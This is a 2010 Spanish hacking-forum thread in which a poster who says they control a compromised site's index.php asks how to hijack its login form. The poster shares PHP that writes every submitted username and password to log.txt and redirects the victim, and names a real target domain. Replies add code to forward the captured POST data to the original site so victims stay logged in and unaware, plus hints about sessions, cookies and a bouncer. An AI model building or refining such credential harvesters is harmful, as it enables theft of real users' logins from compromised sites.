elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  duda sobre pishing.php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda sobre pishing.php  (Leído 5,462 veces)
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
duda sobre pishing.php
« en: 4 Marzo 2010, 19:11 pm »

Hola a todos bueno les cuento tengo una duda lo que pasa es que logre tomar el control de un index.php y quiero editar el <form method="post" ACTION=datos.php

el codigo de datos.php pienso ponerle esto:

Código:
<?php
header ('Location: http://www.web.com/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

pero si ago lo anterior ningun usuario podria autentificarse ya que solamente guardaria los datos y despues lo redireccionaria a otra web  :-(
me gustaria que redireccionara autentificado,existe alguna manera para que se guarden los datos del form o que se intercepten y que despues se logue?
si me pudieran explicar un poquito se los agradeceria demasiado

desde ya gracias


« Última modificación: 4 Marzo 2010, 19:14 pm por bikutoru123 » En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: duda sobre pishing.php
« Respuesta #1 en: 4 Marzo 2010, 19:47 pm »

Pon esto al final:

header ('Location: http://www.web.com/ ');


En línea

.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: duda sobre pishing.php
« Respuesta #2 en: 4 Marzo 2010, 20:46 pm »

No lo logre :/ me redirecciona a la pagina pero no logueado
este es una parte del form de la pagina
<form action='' method='post' name='login_account' id='login_account'>

se podria poner 2 action cosa que pase por el mio (dato.php) y despues por el normal de la web? gracias :)
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
luiggy2


Desconectado Desconectado

Mensajes: 439


¡ Hello word ! XD


Ver Perfil
Re: duda sobre pishing.php
« Respuesta #3 en: 4 Marzo 2010, 20:54 pm »

Si, mirate este código para enviar datos por post a otra web:

Código
  1. <?
  2.  
  3. $host="www.tupagina.com";
  4. $referer="http://referer.com";
  5. $uri="/pagina.php";
  6. $vars="&parametro1=valor1&parametro2=valor2";
  7.  
  8. $header = "Host: $host\r\n";
  9. $header .= "User-Agent: Mosaic\r\n";
  10. $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
  11. $header.="Referer: $referer\r\n";
  12. $header .= "Content-Length: ".strlen($vars)."\r\n";
  13. $header.="Pragma: no-cache\r\n";
  14. $header .= "Connection: close\r\n\r\n";
  15.  
  16. $fp = pfsockopen("tcp://".$host, 80, $errno, $errstr, 20);
  17. fputs($fp, "POST $uri HTTP/1.1\r\n");
  18. fputs($fp, $header.$vars);
  19. while (!feof($fp)){
  20. echo fgets($fp, 128)."<br>";
  21. }
  22. fclose($fp);
  23. ?>

fuente:http://pastebin.com/f7f667268

Saludos!
En línea

" Las grandes ideas suelen salir la mayoría de veces de grandes estupideces "
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: duda sobre pishing.php
« Respuesta #4 en: 4 Marzo 2010, 21:11 pm »

:B soy un poco nulo con esto de php osea el codigo que me mandaste
en el index ¿lo pongo asi?

<form method="post" ACTION=codigo.php

y en el codigo.php pongo el codigo que me enviaste
_____________________________________0
Código:
$referer="http://referer.com";
$uri="/pagina.php";
esta es la ruta de la pagina web original?



en que lugar de mi pagina queda guardado los datos?

muchas gracias por tu ayuda
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: duda sobre pishing.php
« Respuesta #5 en: 4 Marzo 2010, 21:24 pm »

Sabes programar, PHP?
En línea

Te vendería mi talento por poder dormir tranquilo.
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: duda sobre pishing.php
« Respuesta #6 en: 4 Marzo 2010, 21:46 pm »

no,soy pequeño de echo todavia no soy mayor de edad,pretendo estudiarlo en la universidad,porfavor una ayuda  :rolleyes:

hice esto:
Código:
<?php
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
header ('Location: http://fantazymu.web.id/index.php/ ');
exit;
?>

pero todavia no logro entrar como autentificado

el form de la pagina es este:

Código:
                  <form action='' method='post' name='login_account' id='login_account'>
                          <table width='166' border='0' cellspacing='0' cellpadding='0'>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Username</td>
                            </tr>
                            <tr>
                              <th height='16' colspan='2' scope='row'><div align='left'>
                                  <input name='login' type='text' class='login_field' id='login' title='Username' size='15' maxlength='10'>

                                  <input name='account_login' type='hidden' id='account_login' value='account_login'>
                              </div></th>
                            </tr>
                            <tr>
                              <td height='16' colspan='2' class='text_login' scope='row' align='left'>Password</td>
                            </tr>
                            <tr>
                              <th colspan='2' scope='row'><div align='left'>

                                  <input name='pass' type='password' class='login_field' id='pass' title='Password' size='15' maxlength='10'>
                              </div></th>
                            </tr>
                            <tr>
                              <th width='62' height='33' scope='row'><div align='left'>
                                  <input name='Submit' type='submit' class='button' value='Login!' title='Login'>
                              </div></th>
                              <td width='104' scope='row'><div align='left' title='Lost Password' class='link_menu'><a href='http:/uyquelindaweb/index.php?op=lostpassword'>Lost Password </a></div></td>

                            </tr>
                          </table>
                        </form>

lo que ago es cambiar
Código:
<form action='' method='post' name='login_account' id='login_account'>

por esto
Código:
<FORM METHOD="post" ACTION="datos.php"> 

claro guarda los datos pero al momento de redireccionar al index no esta autentificada


En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Nakp
casi es
Ex-Staff
*
Desconectado Desconectado

Mensajes: 6.336

he vuelto :)


Ver Perfil WWW
Re: duda sobre pishing.php
« Respuesta #7 en: 4 Marzo 2010, 22:01 pm »

:¬¬



usa sesiones... te paso un manualito util :P

http://www.desarrolloweb.com/articulos/235.php
En línea

Ojo por ojo, y el mundo acabará ciego.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: duda sobre pishing.php
« Respuesta #8 en: 5 Marzo 2010, 08:46 am »

no puedes hacer eso, tienes que autentificar sesiones con las cookies, enviar y recibir headers o hacer un bouncer.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Pishing Web (Advertencia: Posible sitio de phishing.)
Desarrollo Web
MeCraniDOS 5 4,219 Último mensaje 7 Enero 2013, 12:44 pm
por Novlucker
BACKTRACK 5 R3 PISHING
Hacking
ZuriaHack 0 2,115 Último mensaje 11 Julio 2013, 15:09 pm
por ZuriaHack
Hacking basico - consulta sobre pishing, las pass no se guardan
Hacking
noquiero 1 2,722 Último mensaje 22 Abril 2015, 15:19 pm
por Pablo Videla
Duda:Pishing + True Login
Hacking
Rusty_125 0 1,460 Último mensaje 3 Febrero 2019, 19:04 pm
por Rusty_125
FACEBOOK PISHING
Seguridad
VictorT 2 2,862 Último mensaje 15 Julio 2019, 23:27 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines